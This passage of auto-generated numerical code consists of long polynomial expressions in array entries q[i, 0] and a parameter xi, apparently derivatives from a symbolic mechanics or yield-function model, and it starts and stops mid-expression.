0]*q[2, 0] + q[2, 0]**2)**2 - 898984.910836762*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-q[0, 0] + 2*q[1, 0] - q[2, 
0])*(25283.9506172839*q[0, 0] - 12641.975308642*q[1, 0] - 12641.975308642*q[2, 0]) + 4810558749.47727*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*q[0, 0]**2 + 12641.975308642*q[0, 0]*q[1, 0] + 12641.975308642*q[0, 0]*q[2, 0] - 12641.975308642*q[1, 0]**2 + 12641.975308642*q[1, 0]*q[2, 0] - 12641.975308642*q[2, 0]**2 + 26.6666666666667) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-8017597.91579545*q[0, 0] + 4008798.95789773*q[1, 0] + 4008798.95789773*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + (-337119.341563786*q[0, 0] + 168559.670781893*q[1, 0] + 168559.670781893*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 12828156665.2727*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 
- q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 2004399.47894886*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 7990976.98521566*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 84279.8353909465*(-q[0, 0] + 2*q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + (31963907.9408627*q[0, 0] - 15981953.9704313*q[1, 0] - 15981953.9704313*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (51312626661.0909*q[0, 0] - 25656313330.5455*q[1, 0] - 25656313330.5455*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1422.22222222222*q[0, 0] - 711.111111111111*q[1, 0] - 711.111111111111*q[2, 0]) + (-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 
0]*q[2, 0] + q[2, 0]**2)**3 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] + 2*q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]) - 12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0]) + 12828156665.2727*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])) - 4.44444444444444*q[0, 0] + 8.88888888888889*q[1, 0] + 
8.88888888888889*q[2, 0] + 2.0, -160351958.315909*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 5073636.18108931*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 99887.2123151958*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-q[0, 0] - q[1, 0] + 2*q[2, 0])*(2106.99588477366*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) - 160351958.315909*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (2106.99588477366*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-1053.49794238683*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0] - 474.074074074074)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 160351958.315909*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 5073636.18108931*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 99887.2123151958*(q[0, 0] + q[1, 0] 
+ q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(-2405279374.73864*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 30441817.0865359*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 898984.910836762*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-q[0, 0] - q[1, 0] + 2*q[2, 0])*(25283.9506172839*q[0, 0] - 12641.975308642*q[1, 0] - 12641.975308642*q[2, 0]) + 4810558749.47727*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*q[0, 0]**2 + 12641.975308642*q[0, 0]*q[1, 0] + 12641.975308642*q[0, 0]*q[2, 0] - 12641.975308642*q[1, 0]**2 + 12641.975308642*q[1, 0]*q[2, 0] - 
12641.975308642*q[2, 0]**2 + 26.6666666666667) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-8017597.91579545*q[0, 0] + 4008798.95789773*q[1, 0] + 4008798.95789773*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + (-337119.341563786*q[0, 0] + 168559.670781893*q[1, 0] + 168559.670781893*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 12828156665.2727*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 2004399.47894886*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 7990976.98521566*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 84279.8353909465*(-q[0, 0] - q[1, 0] + 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + (31963907.9408627*q[0, 0] - 15981953.9704313*q[1, 0] - 15981953.9704313*q[2, 0])*(q[0, 0]**2 - 
q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (51312626661.0909*q[0, 0] - 25656313330.5455*q[1, 0] - 25656313330.5455*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 1422.22222222222*q[0, 0] - 711.111111111111*q[1, 0] - 711.111111111111*q[2, 0]) + (-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] - q[1, 0] + 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]) - 
12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0]) - 12828156665.2727*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 405890894.487145*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 7990976.98521566*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 84279.8353909465*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 355.555555555555*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])) - 4.44444444444444*q[0, 0] + 8.88888888888889*q[1, 0] + 8.88888888888889*q[2, 0] + 2.0, (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 
84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(6*q[3, 0] - 3*q[4, 0] - 3*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 2106.99588477366*numpy.sqrt(3)*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])) + (-12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] 
